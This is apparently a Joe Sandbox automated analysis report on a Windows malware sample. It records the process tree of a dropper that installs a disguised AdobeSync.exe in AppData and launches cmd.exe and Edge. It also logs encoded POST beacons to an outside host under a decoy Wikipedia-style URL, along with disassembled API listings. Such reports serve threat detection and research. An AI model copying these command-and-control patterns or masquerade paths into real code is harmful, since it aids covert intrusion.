2025-01-07 12:19:36 UTC | 503 | OUT | POST /2009_New_England_Patriots_season?omlxpbik85mer=%2BBA7Gis1n3XVmJgLCG%2BgLgGVQ1E79NkVzyEnWTmwcxfStdd4il28zJlLoAzjvUO%2BK%2B3IAZfOMRKWTcb%2Fuzy%2FRA%3D%3D HTTP/1.1
                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0
                                                                                                                                                                                                                                                                                                page: DixBvHnlcM48PxLEc7IjwhmUek35rWnNFExDdZ/M9Mft+Zrs5gy+OkNPDkoJDBS1rnOJb3cy5rolkjMpj17XEomZYCIlqHEt59N5hw
                                                                                                                                                                                                                                                                                                Content-Length: 66611
                                                                                                                                                                                                                                                                                                Host: tataragirld.site
2025-01-07 12:19:36 UTC | 841 | IN | HTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                Date: Tue, 07 Jan 2025 12:19:36 GMT
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                ontent: DixBvHnlcM48PxLEc7IjwhmUek35rWnNFExDdZ/M9Mft+Zrs5gy+OkNPDkoJDBS1rnOJb3cy5rolkjMpj17XEomZYCIlqHEt59N5hw
                                                                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=y0Ke2fv3WJjFS3lwV7iemZxVsVM30KDoNYKz%2FRV0Xonu%2Fzbtub2Re%2Fu8LJnGNznTFxI94oTXti5xoYstMmHiIcNLy1od9Di6ExMAnjTJk7I9NRy4vRma2twHGcP4KoqePWIQ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                CF-RAY: 8fe3e5a86f9e0f3a-EWR
                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1767&min_rtt=1712&rtt_var=681&sent=28&recv=74&lost=0&retrans=0&sent_bytes=2840&recv_bytes=67926&delivery_rate=1705607&cwnd=165&unsent_bytes=0&cid=e84fc46efd7e3245&ts=573&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.7 | 50098 | 188.114.97.3 | 443 | 1532 | C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-07 12:19:37 UTC | 500 | OUT | POST /2009_New_England_Patriots_season?omlxpbik85mer=%2BBA7Gis1n3XVmJgLCG%2BgLgGVQ1E79NkVzyEnWTmwcxfStdd4il28zJlLoAzjvUO%2BK%2B3IAZfOMRKWTcb%2Fuzy%2FRA%3D%3D HTTP/1.1
                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0
                                                                                                                                                                                                                                                                                                page: DixBvHnlcM48PxLEc7IjwhmUek35rWnNFExDdZ/M9Mft+Zrs5gy+OkNPDkoJDBS1rnOJb3cy5rolkjMpj17XEomZYCIlqHEt59N5hw
                                                                                                                                                                                                                                                                                                Content-Length: 35
                                                                                                                                                                                                                                                                                                Host: tataragirld.site
2025-01-07 12:19:37 UTC | 35 | OUT | Data Raw: 03 00 00 00 fd ff ff ff 00 00 00 00 00 00 00 00 92 00 02 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                                                                                                                                                                                Data Ascii:
2025-01-07 12:19:37 UTC | 734 | IN | HTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                Date: Tue, 07 Jan 2025 12:19:37 GMT
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yMwMesXzWsH4Xs8taPEqTi1Xk73bdeIsQWcg5116SXMWFjbR%2FrSfS6R%2FD%2BBE7K6XXTIC%2Fw2AEjC22qMfdqHg98yyEuRmNRqP6YbZyMvt%2FVwYS9ykb%2ByPDBVIPt0A7%2FI4JeYK"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                CF-RAY: 8fe3e5ae0a517c9c-EWR
                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1814&min_rtt=1805&rtt_var=696&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2840&recv_bytes=1171&delivery_rate=1552365&cwnd=252&unsent_bytes=0&cid=e5df3a819226584c&ts=334&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.7 | 50099 | 188.114.97.3 | 443 | 5440 | C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-07 12:19:37 UTC | 500 | OUT | POST /2009_New_England_Patriots_season?omlxpbik85mer=%2BBA7Gis1n3XVmJgLCG%2BgLgGVQ1E79NkVzyEnWTmwcxfStdd4il28zJlLoAzjvUO%2BK%2B3IAZfOMRKWTcb%2Fuzy%2FRA%3D%3D HTTP/1.1
                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0
                                                                                                                                                                                                                                                                                                page: DixBvHnlcM48PxLEc7IjwhmUek35rWnNFExDdZ/M9Mft+Zrs5gy+OkNPDkoJDBS1rnOJb3cy5rolkjMpj17XEomZYCIlqHEt59N5hw
                                                                                                                                                                                                                                                                                                Content-Length: 35
                                                                                                                                                                                                                                                                                                Host: tataragirld.site
2025-01-07 12:19:37 UTC | 35 | OUT | Data Raw: 03 00 00 00 fd ff ff ff 00 00 00 00 00 00 00 00 92 00 02 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                                                                                                                                                                                Data Ascii:
2025-01-07 12:19:37 UTC | 730 | IN | HTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                Date: Tue, 07 Jan 2025 12:19:37 GMT
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=byK0fq%2Fv2e0CSPF5yexk5Ru1CuRJf9lAwbOC7EVofyDW%2Bm%2BYEzFjI8Q%2BeabpOtQHSXrzCm1buWUGbebqYa4vzgJUQqmrJ0g%2FPKz2VD7bqfTZNEVgE2xvFH2Phzvcu7klywxP"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                CF-RAY: 8fe3e5b06d1441e6-EWR
                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1752&min_rtt=1748&rtt_var=665&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2841&recv_bytes=1171&delivery_rate=1634023&cwnd=182&unsent_bytes=0&cid=9afa504e35f93c66&ts=334&x=0"


                                                                                                                                                                                                                                                                                                Target ID:0
                                                                                                                                                                                                                                                                                                Start time:07:18:11
                                                                                                                                                                                                                                                                                                Start date:07/01/2025
                                                                                                                                                                                                                                                                                                Path:C:\Users\user\Desktop\LVkAi4PBv6.exe
                                                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                Commandline:"C:\Users\user\Desktop\LVkAi4PBv6.exe"
                                                                                                                                                                                                                                                                                                Imagebase:0x860000
                                                                                                                                                                                                                                                                                                File size:7'012'811 bytes
                                                                                                                                                                                                                                                                                                MD5 hash:DC1A25A3CECFD804E569A7238BA1EC7F
                                                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                Target ID:2
                                                                                                                                                                                                                                                                                                Start time:07:18:11
                                                                                                                                                                                                                                                                                                Start date:07/01/2025
                                                                                                                                                                                                                                                                                                Path:C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exe
                                                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                Commandline:"C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exe" -burn.clean.room="C:\Users\user\Desktop\LVkAi4PBv6.exe" -burn.filehandle.attached=528 -burn.filehandle.self=552
                                                                                                                                                                                                                                                                                                Imagebase:0x5c0000
                                                                                                                                                                                                                                                                                                File size:6'305'325 bytes
                                                                                                                                                                                                                                                                                                MD5 hash:9C540950F5A8981844FF33BFC55D2F36
                                                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                                Has exited:true

Target ID:3
Start time:07:18:12
Start date:07/01/2025
Path:C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exe
Wow64 process (32bit):true
Commandline:C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exe
Imagebase:0x60000
File size:1'219'488 bytes
MD5 hash:F778E9136AB0DB9DE9802A7043DE50A7
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Antivirus matches:
• Detection: 0%, ReversingLabs
Reputation:low
Has exited:true

Target ID:4
Start time:07:18:14
Start date:07/01/2025
Path:C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exe
Wow64 process (32bit):true
Commandline:C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exe
Imagebase:0x600000
File size:1'219'488 bytes
MD5 hash:F778E9136AB0DB9DE9802A7043DE50A7
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Antivirus matches:
• Detection: 0%, ReversingLabs
Reputation:low
Has exited:true

Target ID:5
Start time:07:18:15
Start date:07/01/2025
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:C:\Windows\SysWOW64\cmd.exe
Imagebase:0x410000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:6
Start time:07:18:15
Start date:07/01/2025
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff75da10000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:9
Start time:07:18:41
Start date:07/01/2025
Path:C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
Wow64 process (32bit):false
Commandline:C:\Users\user~1\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
Imagebase:0x140000000
File size:2'364'728 bytes
MD5 hash:967F4470627F823F4D7981E511C9824F
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Antivirus matches:
• Detection: 0%, ReversingLabs
Reputation:moderate
Has exited:true

Target ID:10
Start time:07:18:53
Start date:07/01/2025
Path:C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exe"
Imagebase:0x600000
File size:1'219'488 bytes
MD5 hash:F778E9136AB0DB9DE9802A7043DE50A7
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:low
Has exited:true

Target ID:11
Start time:07:18:53
Start date:07/01/2025
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:C:\Windows\SysWOW64\cmd.exe
Imagebase:0x410000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:12
Start time:07:18:54
Start date:07/01/2025
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff75da10000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:13
Start time:07:19:01
Start date:07/01/2025
Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory="Default"
Imagebase:0x7ff7fb980000
File size:4'210'216 bytes
MD5 hash:69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:14
Start time:07:19:02
Start date:07/01/2025
Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2044 --field-trial-handle=2008,i,10255780505562275753,1680696743736403,262144 /prefetch:3
Imagebase:0x7ff7fb980000
File size:4'210'216 bytes
MD5 hash:69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:15
Start time:07:19:02
Start date:07/01/2025
Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Imagebase:0x7ff7fb980000
File size:4'210'216 bytes
MD5 hash:69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Target ID:16
Start time:07:19:03
Start date:07/01/2025
Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2392 --field-trial-handle=2056,i,9809617510510264235,7690938005942814254,262144 /prefetch:3
Imagebase:0x7ff7fb980000
File size:4'210'216 bytes
MD5 hash:69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Target ID:24
Start time:07:19:08
Start date:07/01/2025
Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):true
Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=7160 --field-trial-handle=2056,i,9809617510510264235,7690938005942814254,262144 /prefetch:8
Imagebase:0xf50000
File size:4'210'216 bytes
MD5 hash:69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:25
Start time:07:19:08
Start date:07/01/2025
Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=7316 --field-trial-handle=2056,i,9809617510510264235,7690938005942814254,262144 /prefetch:8
Imagebase:0x7ff7fb980000
File size:4'210'216 bytes
MD5 hash:69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:27
Start time:07:19:16
Start date:07/01/2025
Path:C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
Wow64 process (32bit):false
Commandline:C:\Users\user~1\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
Imagebase:0x140000000
File size:2'364'728 bytes
                                                                                                                                                                                                                                                                                                MD5 hash:967F4470627F823F4D7981E511C9824F
                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                Target ID:28
                                                                                                                                                                                                                                                                                                Start time:07:20:02
                                                                                                                                                                                                                                                                                                Start date:07/01/2025
                                                                                                                                                                                                                                                                                                Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=7156 --field-trial-handle=2056,i,9809617510510264235,7690938005942814254,262144 /prefetch:8
                                                                                                                                                                                                                                                                                                Imagebase:0x7ff7fb980000
                                                                                                                                                                                                                                                                                                File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                Has exited:false


                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetFileAttributesW.KERNELBASE(?,?,?,?,00000001,00000000,?), ref: 00863D40
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 00863D53
                                                                                                                                                                                                                                                                                                  • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,00000001,00000000,?), ref: 00863D9E
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 00863DA8
                                                                                                                                                                                                                                                                                                  • GetTempPathW.KERNEL32(00000104,?,?,?,?,00000001,00000000,?), ref: 00863DF6
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 00863E00
                                                                                                                                                                                                                                                                                                  • FindFirstFileW.KERNELBASE(?,?,?,*.*,?,?,?,?,00000001,00000000,?), ref: 00863E53
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 00863E64
                                                                                                                                                                                                                                                                                                  • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,00000001,00000000,?), ref: 00863F3E
                                                                                                                                                                                                                                                                                                  • DeleteFileW.KERNELBASE(?,?,?,?,?,?,?,00000001,00000000,?), ref: 00863F52
                                                                                                                                                                                                                                                                                                  • GetTempFileNameW.KERNEL32(?,DEL,00000000,?,?,?,?,00000001,00000000,?), ref: 00863F79
                                                                                                                                                                                                                                                                                                  • MoveFileExW.KERNEL32(?,?,00000001,?,?,?,00000001,00000000,?), ref: 00863F9C
                                                                                                                                                                                                                                                                                                  • MoveFileExW.KERNEL32(?,00000000,00000004,?,?,?,00000001,00000000,?), ref: 00863FB5
                                                                                                                                                                                                                                                                                                  • FindNextFileW.KERNELBASE(000000FF,?,?,?,?,?,?,?,00000001,00000000,?), ref: 00863FC5
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 00863FDA
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 00864009
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 0086402B
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 0086404D
                                                                                                                                                                                                                                                                                                  • RemoveDirectoryW.KERNELBASE(?,?,?,?,00000001,00000000,?), ref: 00864064
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 0086406E
                                                                                                                                                                                                                                                                                                  • MoveFileExW.KERNEL32(?,00000000,00000004,?,?,?,00000001,00000000,?), ref: 00864095
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 008640B0
                                                                                                                                                                                                                                                                                                  • FindClose.KERNEL32(000000FF,?,?,?,00000001,00000000,?), ref: 008640E6
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorFileLast$AttributesFindMove$Temp$CloseDeleteDirectoryFirstNameNextPathRemove
                                                                                                                                                                                                                                                                                                  • String ID: *.*$DEL$dirutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 1544372074-1252831301
                                                                                                                                                                                                                                                                                                  • Opcode ID: 2b32dbe1b5db2809a67adf2e08e89032016b7281723575df8ed5d3832045b86d
                                                                                                                                                                                                                                                                                                  • Instruction ID: 1f07bcd12bd05561e6bf24c06f6174303b88756333899db820ca4a3380e4c451
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2b32dbe1b5db2809a67adf2e08e89032016b7281723575df8ed5d3832045b86d
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 47B1DA72D41639ABDB315A648C05B9EB679FF40760F0302A5EE08FB191DB729E90CF91

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,?), ref: 00865217
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A04F8: InitializeCriticalSection.KERNEL32(008CB5FC,?,00865223,00000000,?,?,?,?,?,?), ref: 008A050F
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0086120A: CommandLineToArgvW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000,ignored ,00000000,?,00000000,?,?,?,0086523F,00000000,?), ref: 00861248
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0086120A: GetLastError.KERNEL32(?,?,?,0086523F,00000000,?,?,00000003,00000000,00000000,?,?,?,?,?,?), ref: 00861252
                                                                                                                                                                                                                                                                                                  • CoInitializeEx.COMBASE(00000000,00000000,?,?,00000000,?,?,00000003,00000000,00000000,?,?,?,?,?,?), ref: 00865285
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A0E07: GetProcAddress.KERNEL32(RegDeleteKeyExW,AdvApi32.dll), ref: 008A0E28
                                                                                                                                                                                                                                                                                                  • GetVersionExW.KERNEL32(?,?,?,?,?,?,?), ref: 00865317
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?), ref: 00865321
                                                                                                                                                                                                                                                                                                  • CoUninitialize.COMBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0086558E
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to initialize core., xrefs: 008653C3
                                                                                                                                                                                                                                                                                                  • Failed to initialize engine state., xrefs: 0086526C
                                                                                                                                                                                                                                                                                                  • Failed to run per-machine mode., xrefs: 0086546C
                                                                                                                                                                                                                                                                                                  • Failed to run untrusted mode., xrefs: 008654B6
                                                                                                                                                                                                                                                                                                  • Failed to initialize Regutil., xrefs: 008652C9
                                                                                                                                                                                                                                                                                                  • Failed to parse command line., xrefs: 00865245
                                                                                                                                                                                                                                                                                                  • Failed to run RunOnce mode., xrefs: 0086541C
                                                                                                                                                                                                                                                                                                  • Failed to get OS info., xrefs: 0086534F
                                                                                                                                                                                                                                                                                                  • Failed to initialize Wiutil., xrefs: 008652E1
                                                                                                                                                                                                                                                                                                  • Failed to run per-user mode., xrefs: 00865494
                                                                                                                                                                                                                                                                                                  • Failed to initialize XML util., xrefs: 008652F9
                                                                                                                                                                                                                                                                                                  • Failed to initialize COM., xrefs: 00865291
                                                                                                                                                                                                                                                                                                  • engine.cpp, xrefs: 00865345
                                                                                                                                                                                                                                                                                                  • Failed to run embedded mode., xrefs: 00865444
                                                                                                                                                                                                                                                                                                  • 3.11.1.2318, xrefs: 00865384
                                                                                                                                                                                                                                                                                                  • Failed to initialize Cryputil., xrefs: 008652A6
                                                                                                                                                                                                                                                                                                  • Invalid run mode., xrefs: 008653F9
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
• Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorInitializeLast$AddressArgvCommandCriticalHandleLineModuleProcSectionUninitializeVersion
                                                                                                                                                                                                                                                                                                  • String ID: 3.11.1.2318$Failed to get OS info.$Failed to initialize COM.$Failed to initialize Cryputil.$Failed to initialize Regutil.$Failed to initialize Wiutil.$Failed to initialize XML util.$Failed to initialize core.$Failed to initialize engine state.$Failed to parse command line.$Failed to run RunOnce mode.$Failed to run embedded mode.$Failed to run per-machine mode.$Failed to run per-user mode.$Failed to run untrusted mode.$Invalid run mode.$engine.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 3262001429-510904028
                                                                                                                                                                                                                                                                                                  • Opcode ID: ec113dd112c6bcb3025cbe235f2a11a46da63e7f4cb56d4015d1ccd0205e2b5e
                                                                                                                                                                                                                                                                                                  • Instruction ID: 8465405db52b8146bf323895aa471f427ba399cf9bd59bd12de9e004f7984d27
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ec113dd112c6bcb3025cbe235f2a11a46da63e7f4cb56d4015d1ccd0205e2b5e
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 14B1A271D40A399BEB32AB68CC56BED76A5FF05710F0601E5E908E6341DB749E80CF92
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,00000000,00000000,008A3609,00000000,?,00000000), ref: 008A3069
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,0088C025,?,00865405,?,00000000,?), ref: 008A3075
